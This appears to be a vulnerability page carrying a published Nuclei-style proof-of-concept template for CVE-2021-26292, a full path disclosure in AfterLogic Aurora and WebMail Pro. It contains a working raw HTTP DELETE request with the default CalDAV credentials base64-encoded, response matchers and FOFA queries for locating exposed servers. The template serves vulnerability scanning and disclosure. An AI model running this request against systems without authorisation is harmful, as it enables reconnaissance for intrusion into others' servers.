AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
PoC代码[已公开]
id: CVE-2021-26292
info:
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
author: johnk3r
severity: low
description: |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
reference:
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-26292
classification:
cve-id: CVE-2021-26292
metadata:
verified: true
max-request: 1
vendor: AfterLogic
product: AfterLogic Aurora & WebMail
fofa-query:
- "X-Server: AfterlogicDAVServer"
- "x-server: afterlogicdavserver"
tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic
http:
- raw:
- |
DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
matchers-condition: and
matchers:
- type: word
part: body
words:
- "caldav_public_user"
- "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
condition: and
- type: word
part: header
words:
- "application/xml"
- type: status
status:
- 404
# digest: 490a00463044022051f8e7c10b58ea6b1e57fa3626d525d2c884998696e524d660257a7f200b1d99022054d6faab850eb483b2c23970db001e48e7be064a434dc628951123c410607290:922c64590222798bb761d5b6d8e72950